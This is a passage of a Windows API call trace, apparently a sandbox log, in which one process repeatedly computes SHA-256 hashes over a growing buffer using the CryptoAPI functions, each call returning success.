phProv=0xcea30, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcea30*=0x7ded40) returned 1 [0146.901] CryptCreateHash (in: hProv=0x7ded40, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcea20 | out: phHash=0xcea20) returned 1 [0146.901] CryptHashData (hHash=0x332b7660, pbData=0x32e4a600, dwDataLen=0xa0, dwFlags=0x0) returned 1 [0146.901] CryptGetHashParam (in: hHash=0x332b7660, dwParam=0x4, pbData=0xcea1c, pdwDataLen=0xcea2c, dwFlags=0x0 | out: pbData=0xcea1c, pdwDataLen=0xcea2c) returned 1 [0146.901] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e54850 [0146.901] CryptGetHashParam (in: hHash=0x332b7660, dwParam=0x2, pbData=0x32e54850, pdwDataLen=0xcea1c, dwFlags=0x0 | out: pbData=0x32e54850, pdwDataLen=0xcea1c) returned 1 [0146.901] CryptDestroyHash (hHash=0x332b7660) returned 1 [0146.901] CryptReleaseContext (hProv=0x7ded40, dwFlags=0x0) returned 1 [0146.901] CryptAcquireContextW (in: phProv=0xcea30, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcea30*=0x7ded40) returned 1 [0146.901] CryptCreateHash (in: hProv=0x7ded40, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcea20 | out: phHash=0xcea20) returned 1 [0146.901] CryptHashData (hHash=0x332b7660, pbData=0x32e4a600, dwDataLen=0xc0, dwFlags=0x0) returned 1 [0146.901] CryptGetHashParam (in: hHash=0x332b7660, dwParam=0x4, pbData=0xcea1c, pdwDataLen=0xcea2c, dwFlags=0x0 | out: pbData=0xcea1c, pdwDataLen=0xcea2c) returned 1 [0146.901] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e544f0 [0146.901] CryptGetHashParam (in: hHash=0x332b7660, dwParam=0x2, pbData=0x32e544f0, pdwDataLen=0xcea1c, dwFlags=0x0 | out: pbData=0x32e544f0, pdwDataLen=0xcea1c) returned 1 [0146.901] CryptDestroyHash (hHash=0x332b7660) returned 1 [0146.901] CryptReleaseContext (hProv=0x7ded40, dwFlags=0x0) returned 1 [0146.901] CryptAcquireContextW (in: phProv=0xcea30, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcea30*=0x7ded40) returned 1 [0146.902] CryptCreateHash (in: hProv=0x7ded40, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcea20 | out: phHash=0xcea20) returned 1 [0146.902] CryptHashData (hHash=0x332b7660, pbData=0x32e4a600, dwDataLen=0xe0, dwFlags=0x0) returned 1 [0146.902] CryptGetHashParam (in: hHash=0x332b7660, dwParam=0x4, pbData=0xcea1c, pdwDataLen=0xcea2c, dwFlags=0x0 | out: pbData=0xcea1c, pdwDataLen=0xcea2c) returned 1 [0146.902] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e542e0 [0146.902] CryptGetHashParam (in: hHash=0x332b7660, dwParam=0x2, pbData=0x32e542e0, pdwDataLen=0xcea1c, dwFlags=0x0 | out: pbData=0x32e542e0, pdwDataLen=0xcea1c) returned 1 [0146.902] CryptDestroyHash (hHash=0x332b7660) returned 1 [0146.902] CryptReleaseContext (hProv=0x7ded40, dwFlags=0x0) returned 1 [0146.902] CryptAcquireContextW (in: phProv=0xcea30, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcea30*=0x7ded40) returned 1 [0146.903] CryptCreateHash (in: hProv=0x7ded40, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcea20 | out: phHash=0xcea20) returned 1 [0146.903] CryptHashData (hHash=0x332b7660, pbData=0x32e4a600, dwDataLen=0x100, dwFlags=0x0) returned 1 [0146.903] CryptGetHashParam (in: hHash=0x332b7660, dwParam=0x4, pbData=0xcea1c, pdwDataLen=0xcea2c, dwFlags=0x0 | out: pbData=0xcea1c, pdwDataLen=0xcea2c) returned 1 [0146.903] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e54430 [0146.903] CryptGetHashParam (in: hHash=0x332b7660, dwParam=0x2, pbData=0x32e54430, pdwDataLen=0xcea1c, dwFlags=0x0 | out: pbData=0x32e54430, pdwDataLen=0xcea1c) returned 1 [0146.903] CryptDestroyHash (hHash=0x332b7660) returned 1 [0146.903] CryptReleaseContext (hProv=0x7ded40, dwFlags=0x0) returned 1 [0146.903] CryptAcquireContextW (in: phProv=0xcea30, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcea30*=0x7ded40) returned 1 [0146.903] CryptCreateHash (in: hProv=0x7ded40, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcea20 | out: phHash=0xcea20) returned 1 [0146.903] CryptHashData (hHash=0x332b7820, pbData=0x32e4a600, dwDataLen=0x120, dwFlags=0x0) returned 1 [0146.903] CryptGetHashParam (in: hHash=0x332b7820, dwParam=0x4, pbData=0xcea1c, pdwDataLen=0xcea2c, dwFlags=0x0 | out: pbData=0xcea1c, pdwDataLen=0xcea2c) returned 1 [0146.903] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e54cd0 [0146.903] CryptGetHashParam (in: hHash=0x332b7820, dwParam=0x2, pbData=0x32e54cd0, pdwDataLen=0xcea1c, dwFlags=0x0 | out: pbData=0x32e54cd0, pdwDataLen=0xcea1c) returned 1 [0146.903] CryptDestroyHash (hHash=0x332b7820) returned 1 [0146.904] CryptReleaseContext (hProv=0x7ded40, dwFlags=0x0) returned 1 [0146.904] CryptAcquireContextW (in: phProv=0xcea30, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcea30*=0x7ded40) returned 1 [0146.904] CryptCreateHash (in: hProv=0x7ded40, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcea20 | out: phHash=0xcea20) returned 1 [0146.904] CryptHashData (hHash=0x332b77b0, pbData=0x32e4a600, dwDataLen=0x140, dwFlags=0x0) returned 1 [0146.904] CryptGetHashParam (in: hHash=0x332b77b0, dwParam=0x4, pbData=0xcea1c, pdwDataLen=0xcea2c, dwFlags=0x0 | out: pbData=0xcea1c, pdwDataLen=0xcea2c) returned 1 [0146.904] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e54eb0 [0146.904] CryptGetHashParam (in: hHash=0x332b77b0, dwParam=0x2, pbData=0x32e54eb0, pdwDataLen=0xcea1c, dwFlags=0x0 | out: pbData=0x32e54eb0, pdwDataLen=0xcea1c) returned 1 [0146.904] CryptDestroyHash (hHash=0x332b77b0) returned 1 [0146.904] CryptReleaseContext (hProv=0x7ded40, dwFlags=0x0) returned 1 [0146.904] CryptAcquireContextW (in: phProv=0xcea30, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcea30*=0x7ded40) returned 1 [0146.905] CryptCreateHash (in: hProv=0x7ded40, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcea20 | out: phHash=0xcea20) returned 1 [0146.905] CryptHashData (hHash=0x332b7a50, pbData=0x32e4a600, dwDataLen=0x160, dwFlags=0x0) returned 1 [0146.905] CryptGetHashParam (in: hHash=0x332b7a50, dwParam=0x4, pbData=0xcea1c, pdwDataLen=0xcea2c, dwFlags=0x0 | out: pbData=0xcea1c, pdwDataLen=0xcea2c) returned 1 [0146.905] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e54e80 [0146.905] CryptGetHashParam (in: hHash=0x332b7a50, dwParam=0x2, pbData=0x32e54e80, pdwDataLen=0xcea1c, dwFlags=0x0 | out: pbData=0x32e54e80, pdwDataLen=0xcea1c) returned 1 [0146.905] CryptDestroyHash (hHash=0x332b7a50) returned 1 [0146.905] CryptReleaseContext (hProv=0x7ded40, dwFlags=0x0) returned 1 [0146.905] CryptAcquireContextW (in: phProv=0xcea30, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcea30*=0x7ded40) returned 1 [0146.906] CryptCreateHash (in: hProv=0x7ded40, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcea20 | out: phHash=0xcea20) returned 1 [0146.906] CryptHashData (hHash=0x332b7660, pbData=0x32e4a600, dwDataLen=0x180, dwFlags=0x0) returned 1 [0146.906] CryptGetHashParam (in: hHash=0x332b7660, dwParam=0x4, pbData=0xcea1c, pdwDataLen=0xcea2c, dwFlags=0x0 | out: pbData=0xcea1c, pdwDataLen=0xcea2c) returned 1 [0146.906] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e54d90 [0146.906] CryptGetHashParam (in: hHash=0x332b7660, dwParam=0x2, pbData=0x32e54d90, pdwDataLen=0xcea1c, dwFlags=0x0 | out: pbData=0x32e54d90, pdwDataLen=0xcea1c) returned 1 [0146.906] CryptDestroyHash (hHash=0x332b7660) returned 1 [0146.906] CryptReleaseContext (hProv=0x7ded40, dwFlags=0x0) returned 1 [0146.906] CryptAcquireContextW (in: phProv=0xcea30, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcea30*=0x7ded40) returned 1 [0146.906] CryptCreateHash (in: hProv=0x7ded40, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcea20 | out: phHash=0xcea20) returned 1 [0146.906] CryptHashData (hHash=0x332b7660, pbData=0x32e4a600, dwDataLen=0x1a0, dwFlags=0x0) returned 1 [0146.906] CryptGetHashParam (in: hHash=0x332b7660, dwParam=0x4, pbData=0xcea1c, pdwDataLen=0xcea2c, dwFlags=0x0 | out: pbData=0xcea1c, pdwDataLen=0xcea2c) returned 1 [0146.906] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e54310 [0146.906] CryptGetHashParam (in: hHash=0x332b7660, dwParam=0x2, pbData=0x32e54310, pdwDataLen=0xcea1c, dwFlags=0x0 | out: pbData=0x32e54310, pdwDataLen=0xcea1c) returned 1 [0146.906] CryptDestroyHash (hHash=0x332b7660) returned 1 [0146.906] CryptReleaseContext (hProv=0x7ded40, dwFlags=0x0) returned 1 [0146.906] CryptAcquireContextW (in: phProv=0xcea30, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcea30*=0x7ded40) returned 1 [0146.907] CryptCreateHash (in: hProv=0x7ded40, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcea20 | out: phHash=0xcea20) returned 1 [0146.907] CryptHashData (hHash=0x332b7660, pbData=0x32e4a600, dwDataLen=0x1c0, dwFlags=0x0) returned 1 [0146.907] CryptGetHashParam (in: hHash=0x332b7660, dwParam=0x4, pbData=0xcea1c, pdwDataLen=0xcea2c, dwFlags=0x0 | out: pbData=0xcea1c, pdwDataLen=0xcea2c) returned 1 [0146.907] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e54c70 [0146.907] CryptGetHashParam (in: hHash=0x332b7660, dwParam=0x2, pbData=0x32e54c70, pdwDataLen=0xcea1c, dwFlags=0x0 | out: pbData=0x32e54c70, pdwDataLen=0xcea1c) returned 1 [0146.907] CryptDestroyHash (hHash=0x332b7660) returned 1 [0146.907] CryptReleaseContext (hProv=0x7ded40, dwFlags=0x0) returned 1 [0146.907] CryptAcquireContextW (in: phProv=0xcea30, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcea30*=0x7ded40) returned 1 [0146.907] CryptCreateHash (in: hProv=0x7ded40, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcea20 | out: phHash=0xcea20) returned 1 [0146.908] CryptHashData (hHash=0x332b7660, pbData=0x32e4a600, dwDataLen=0x1e0, dwFlags=0x0) returned 1 [0146.908] CryptGetHashParam (in: hHash=0x332b7660, dwParam=0x4, pbData=0xcea1c, pdwDataLen=0xcea2c, dwFlags=0x0 | out: pbData=0xcea1c, pdwDataLen=0xcea2c) returned 1 [0146.908] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e54a60 [0146.908] CryptGetHashParam (in: hHash=0x332b7660, dwParam=0x2, pbData=0x32e54a60, pdwDataLen=0xcea1c, dwFlags=0x0 | out: pbData=0x32e54a60, pdwDataLen=0xcea1c) returned 1 [0146.908] CryptDestroyHash (hHash=0x332b7660) returned 1 [0146.908] CryptReleaseContext (hProv=0x7ded40, dwFlags=0x0) returned 1 [0146.908] CryptAcquireContextW (in: phProv=0xcea30, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcea30*=0x7ded40) returned 1 [0146.908] CryptCreateHash (in: hProv=0x7ded40, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcea20 | out: phHash=0xcea20) returned 1 [0146.908] CryptHashData (hHash=0x332b7970, pbData=0x32e4a600, dwDataLen=0x200, dwFlags=0x0) returned 1 [0146.908] CryptGetHashParam (in: hHash=0x332b7970, dwParam=0x4, pbData=0xcea1c, pdwDataLen=0xcea2c, dwFlags=0x0 | out: pbData=0xcea1c, pdwDataLen=0xcea2c) returned 1 [0146.908] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e54880 [0146.908] CryptGetHashParam (in: hHash=0x332b7970, dwParam=0x2, pbData=0x32e54880, pdwDataLen=0xcea1c, dwFlags=0x0 | out: pbData=0x32e54880, pdwDataLen=0xcea1c) returned 1 [0146.908] CryptDestroyHash (hHash=0x332b7970) returned 1 [0146.908] CryptReleaseContext (hProv=0x7ded40, dwFlags=0x0) returned 1 [0146.909] CryptAcquireContextW (in: phProv=0xcea30, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcea30*=0x7ded40) returned 1 [0146.909] CryptCreateHash (in: hProv=0x7ded40, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcea20 | out: phHash=0xcea20) returned 1 [0146.909] CryptHashData (hHash=0x332b7660, pbData=0x32e4a600, dwDataLen=0x220, dwFlags=0x0) returned 1 [0146.909] CryptGetHashParam (in: hHash=0x332b7660, dwParam=0x4, pbData=0xcea1c, pdwDataLen=0xcea2c, dwFlags=0x0 | out: pbData=0xcea1c, pdwDataLen=0xcea2c) returned 1 [0146.909] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e54b50 [0146.909] CryptGetHashParam (in: hHash=0x332b7660, dwParam=0x2, pbData=0x32e54b50, pdwDataLen=0xcea1c, dwFlags=0x0 | out: pbData=0x32e54b50, pdwDataLen=0xcea1c) returned 1 [0146.909] CryptDestroyHash (hHash=0x332b7660) returned 1 [0146.909] CryptReleaseContext (hProv=0x7ded40, dwFlags=0x0) returned 1 [0146.909] CryptAcquireContextW (in: phProv=0xcea30, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcea30*=0x7ded40) returned 1 [0146.910] CryptCreateHash (in: hProv=0x7ded40, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcea20 | out: phHash=0xcea20) returned 1 [0146.910] CryptHashData (hHash=0x332b7d60, pbData=0x32e4a600, dwDataLen=0x240, dwFlags=0x0) returned 1 [0146.910] CryptGetHashParam (in: hHash=0x332b7d60, dwParam=0x4, pbData=0xcea1c, pdwDataLen=0xcea2c, dwFlags=0x0 | out: pbData=0xcea1c, pdwDataLen=0xcea2c) returned 1 [0146.910] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e54a00 [0146.910] CryptGetHashParam (in: hHash=0x332b7d60, dwParam=0x2, pbData=0x32e54a00, pdwDataLen=0xcea1c, dwFlags=0x0 | out: pbData=0x32e54a00, pdwDataLen=0xcea1c) returned 1 [0146.910] CryptDestroyHash (hHash=0x332b7d60) returned 1 [0146.910] CryptReleaseContext (hProv=0x7ded40, dwFlags=0x0) returned 1 [0146.910] CryptAcquireContextW (in: phProv=0xcea30, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcea30*=0x7ded40) returned 1 [0146.910] CryptCreateHash (in: hProv=0x7ded40, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcea20 | out: phHash=0xcea20) returned 1 [0146.910] CryptHashData (hHash=0x332b7890, pbData=0x32e4a600, dwDataLen=0x260, dwFlags=0x0) returned 1 [0146.910] CryptGetHashParam (in: hHash=0x332b7890, dwParam=0x4, pbData=0xcea1c, pdwDataLen=0xcea2c, dwFlags=0x0 | out: pbData=0xcea1c, pdwDataLen=0xcea2c) returned 1 [0146.910] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e54a30 [0146.911] CryptGetHashParam (in: hHash=0x332b7890, dwParam=0x2, pbData=0x32e54a30, pdwDataLen=0xcea1c, dwFlags=0x0 | out: pbData=0x32e54a30, pdwDataLen=0xcea1c) returned 1 [0146.911] CryptDestroyHash (hHash=0x332b7890) returned 1 [0146.911] CryptReleaseContext (hProv=0x7ded40, dwFlags=0x0) returned 1 [0146.911] CryptAcquireContextW (in: phProv=0xcea30, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcea30*=0x7ded40) returned 1 [0146.911] CryptCreateHash (in: hProv=0x7ded40, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcea20 | out: phHash=0xcea20) returned 1 [0146.911] CryptHashData (hHash=0x332b7660, pbData=0x32e4a600, dwDataLen=0x280, dwFlags=0x0) returned 1 [0146.911] CryptGetHashParam (in: hHash=0x332b7660, dwParam=0x4, pbData=0xcea1c, pdwDataLen=0xcea2c, dwFlags=0x0 | out: pbData=0xcea1c, pdwDataLen=0xcea2c) returned 1 [0146.911] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e54d00 [0146.911] CryptGetHashParam (in: hHash=0x332b7660, dwParam=0x2, pbData=0x32e54d00, pdwDataLen=0xcea1c, dwFlags=0x0 | out: pbData=0x32e54d00, pdwDataLen=0xcea1c) returned 1 [0146.911] CryptDestroyHash (hHash=0x332b7660) returned 1 [0146.911] CryptReleaseContext (hProv=0x7ded40, dwFlags=0x0) returned 1 [0146.911] CryptAcquireContextW (in: phProv=0xcea30, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcea30*=0x7ded40) returned 1 [0146.912] CryptCreateHash (in: hProv=0x7ded40, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcea20 | out: phHash=0xcea20) returned 1 [0146.912] CryptHashData (hHash=0x332b7660, pbData=0x32e4a600, dwDataLen=0x2a0, dwFlags=0x0) returned 1 [0146.912] CryptGetHashParam (in: hHash=0x332b7660, dwParam=0x4, pbData=0xcea1c, pdwDataLen=0xcea2c, dwFlags=0x0 | out: pbData=0xcea1c, pdwDataLen=0xcea2c) returned 1 [0146.912] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e54970 [0146.912] CryptGetHashParam (in: hHash=0x332b7660, dwParam=0x2, pbData=0x32e54970, pdwDataLen=0xcea1c, dwFlags=0x0 | out: pbData=0x32e54970, pdwDataLen=0xcea1c) returned 1 [0146.912] CryptDestroyHash (hHash=0x332b7660) returned 1 [0146.912] CryptReleaseContext (hProv=0x7ded40, dwFlags=0x0) returned 1 [0146.912] CryptAcquireContextW (in: phProv=0xcea30, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcea30*=0x7ded40) returned 1 [0146.912] CryptCreateHash (in: hProv=0x7ded40, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcea20 | out: phHash=0xcea20) returned 1 [0146.912] CryptHashData (hHash=0x332b7660, pbData=0x32e4a600, dwDataLen=0x2c0, dwFlags=0x0) returned 1 [0146.913] CryptGetHashParam (in: hHash=0x332b7660, dwParam=0x4, pbData=0xcea1c, pdwDataLen=0xcea2c, dwFlags=0x0 | out: pbData=0xcea1c, pdwDataLen=0xcea2c) returned 1 [0146.913] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e54790 [0146.913] CryptGetHashParam (in: hHash=0x332b7660, dwParam=0x2, pbData=0x32e54790, pdwDataLen=0xcea1c, dwFlags=0x0 | out: pbData=0x32e54790, pdwDataLen=0xcea1c) returned 1 [0146.913] CryptDestroyHash (hHash=0x332b7660) returned 1 [0146.913] CryptReleaseContext (hProv=0x7ded40, dwFlags=0x0) returned 1 [0146.913] CryptAcquireContextW (in: phProv=0xcea30, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcea30*=0x7ded40) returned 1 [0146.913] CryptCreateHash (in: hProv=0x7ded40, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcea20 | out: phHash=0xcea20) returned 1 [0146.913] CryptHashData (hHash=0x332b7660, pbData=0x32e4a600, dwDataLen=0x2e0, dwFlags=0x0) returned 1 [0146.913] CryptGetHashParam (in: hHash=0x332b7660, dwParam=0x4, pbData=0xcea1c, pdwDataLen=0xcea2c, dwFlags=0x0 | out: pbData=0xcea1c, pdwDataLen=0xcea2c) returned 1 [0146.913] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e54ca0 [0146.913] CryptGetHashParam (in: hHash=0x332b7660, dwParam=0x2, pbData=0x32e54ca0, pdwDataLen=0xcea1c, dwFlags=0x0 | out: pbData=0x32e54ca0, pdwDataLen=0xcea1c) returned 1 [0146.913] CryptDestroyHash (hHash=0x332b7660) returned 1 [0146.913] CryptReleaseContext (hProv=0x7ded40, dwFlags=0x0) returned 1 [0146.913] CryptAcquireContextW (in: phProv=0xcea30, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcea30*=0x7ded40) returned 1 [0146.914] CryptCreateHash (in: hProv=0x7ded40, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcea20 | out: phHash=0xcea20) returned 1 [0146.914] CryptHashData (hHash=0x332b7660, pbData=0x32e4a600, dwDataLen=0x300, dwFlags=0x0) returned 1 [0146.914] CryptGetHashParam (in: hHash=0x332b7660, dwParam=0x4, pbData=0xcea1c, pdwDataLen=0xcea2c, dwFlags=0x0 | out: pbData=0xcea1c, pdwDataLen=0xcea2c) returned 1 [0146.914] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e54550 [0146.914] CryptGetHashParam (in: hHash=0x332b7660, dwParam=0x2, pbData=0x32e54550, pdwDataLen=0xcea1c, dwFlags=0x0 | out: pbData=0x32e54550, pdwDataLen=0xcea1c) returned 1 [0146.914] CryptDestroyHash (hHash=0x332b7660) returned 1 [0146.914] CryptReleaseContext (hProv=0x7ded40, dwFlags=0x0) returned 1 [0146.914] CryptAcquireContextW (in: phProv=0xcea30, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcea30*=0x7ded40) returned 1 [0146.915] CryptCreateHash (in: hProv=0x7ded40, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcea20 | out: phHash=0xcea20) returned 1 [0146.915] CryptHashData (hHash=0x332b77b0, pbData=0x32e4a600, dwDataLen=0x320, dwFlags=0x0) returned 1 [0146.915] CryptGetHashParam (in: hHash=0x332b77b0, dwParam=0x4, pbData=0xcea1c, pdwDataLen=0xcea2c, dwFlags=0x0 | out: pbData=0xcea1c, pdwDataLen=0xcea2c) returned 1 [0146.915] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e54670 [0146.915] CryptGetHashParam (in: hHash=0x332b77b0, dwParam=0x2, pbData=0x32e54670, pdwDataLen=0xcea1c, dwFlags=0x0 | out: pbData=0x32e54670, pdwDataLen=0xcea1c) returned 1 [0146.915] CryptDestroyHash (hHash=0x332b77b0) returned 1 [0146.915] CryptReleaseContext (hProv=0x7ded40, dwFlags=0x0) returned 1 [0146.915] CryptAcquireContextW (in: phProv=0xcea30, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcea30*=0x7ded40) returned 1 [0146.915] CryptCreateHash (in: hProv=0x7ded40, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcea20 | out: phHash=0xcea20) returned 1 [0146.915] CryptHashData (hHash=0x332b77b0, pbData=0x32e4a600, dwDataLen=0x340, dwFlags=0x0) returned 1 [0146.915] CryptGetHashParam (in: hHash=0x332b77b0, dwParam=0x4, pbData=0xcea1c, pdwDataLen=0xcea2c, dwFlags=0x0 | out: pbData=0xcea1c, pdwDataLen=0xcea2c) returned 1 [0146.915] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e54d30 [0146.915] CryptGetHashParam (in: hHash=0x332b77b0, dwParam=0x2, pbData=0x32e54d30, pdwDataLen=0xcea1c, dwFlags=0x0 | out: pbData=0x32e54d30, pdwDataLen=0xcea1c) returned 1 [0146.915] CryptDestroyHash (hHash=0x332b77b0) returned 1 [0146.915] CryptReleaseContext (hProv=0x7ded40, dwFlags=0x0) returned 1 [0146.915] CryptAcquireContextW (in: phProv=0xcea30, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcea30*=0x7ded40) returned 1 [0146.916] CryptCreateHash (in: hProv=0x7ded40, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcea20 | out: phHash=0xcea20) returned 1 [0146.916] CryptHashData (hHash=0x332b7900, pbData=0x32e4a600, dwDataLen=0x360, dwFlags=0x0) returned 1 [0146.916] CryptGetHashParam (in: hHash=0x332b7900, dwParam=0x4, pbData=0xcea1c, pdwDataLen=0xcea2c, dwFlags=0x0 | out: pbData=0xcea1c, pdwDataLen=0xcea2c) returned 1 [0146.916] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e54ac0 [0146.916] CryptGetHashParam (in: hHash=0x332b7900, dwParam=0x2, pbData=0x32e54ac0, pdwDataLen=0xcea1c, dwFlags=0x0 | out: pbData=0x32e54ac0, pdwDataLen=0xcea1c) returned 1 [0146.916] CryptDestroyHash (hHash=0x332b7900) returned 1 [0146.916] CryptReleaseContext (hProv=0x7ded40, dwFlags=0x0) returned 1 [0146.916] CryptAcquireContextW (in: phProv=0xcea30, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcea30*=0x7ded40) returned 1 [0146.917] CryptCreateHash (in: hProv=0x7ded40, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcea20 | out: phHash=0xcea20) returned 1 [0146.917] CryptHashData (hHash=0x332b77b0, pbData=0x32e4a600, dwDataLen=0x380, dwFlags=0x0) returned 1 [0146.917] CryptGetHashParam (in: hHash=0x332b77b0, dwParam=0x4, pbData=0xcea1c, pdwDataLen=0xcea2c, dwFlags=0x0 | out: pbData=0xcea1c, pdwDataLen=0xcea2c) returned 1 [0146.917] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e54b80 [0146.917] CryptGetHashParam (in: hHash=0x332b77b0, dwParam=0x2, pbData=0x32e54b80, pdwDataLen=0xcea1c, dwFlags=0x0 | out: pbData=0x32e54b80, pdwDataLen=0xcea1c) returned 1 [0146.917] CryptDestroyHash (hHash=0x332b77b0) returned 1 [0146.917] CryptReleaseContext (hProv=0x7ded40, dwFlags=0x0) returned 1 [0146.917] CryptAcquireContextW (in: phProv=0xcea30, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcea30*=0x7ded40) returned 1 [0146.917] CryptCreateHash (in: hProv=0x7ded40, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcea20 | out: phHash=0xcea20) returned 1 [0146.917] CryptHashData (hHash=0x332b7660, pbData=0x32e4a600, dwDataLen=0x3a0, dwFlags=0x0) returned 1 [0146.917] CryptGetHashParam (in: hHash=0x332b7660, dwParam=0x4, pbData=0xcea1c, pdwDataLen=0xcea2c, dwFlags=0x0 | out: pbData=0xcea1c, pdwDataLen=0xcea2c) returned 1 [0146.917] RtlAllocateHeap (HeapHandle=0x2150000, Flags=0x8, Size=0x20) returned 0x32e54d60 [0146.917] CryptGetHashParam (in: hHash=0x332b7660, dwParam=0x2, pbData=0x32e54d60, pdwDataLen=0xcea1c, dwFlags=0x0 | out: pbData=0x32e54d60, pdwDataLen=0xcea1c) returned 1 [0146.918] CryptDestroyHash (hHash=0x332b7660) returned 1 [0146.918] CryptReleaseContext (hProv=0x7ded40, dwFlags=0x0) returned 1 [0146.918] CryptAcquireContextW (in: phProv=0xcea30, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xcea30*=0x7ded40) returned 1 [0146.918] CryptCreateHash (in: hProv=0x7ded40, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0xcea20 | out: phHash=0xcea20) returned 1 [0146.918] CryptHashData (hHash=0x332b7660, pbData=0x32e4a600, dwDataLen=0x3c0, dwFlags=0x0) returned 1 [0146.918] CryptGetHashParam (in: 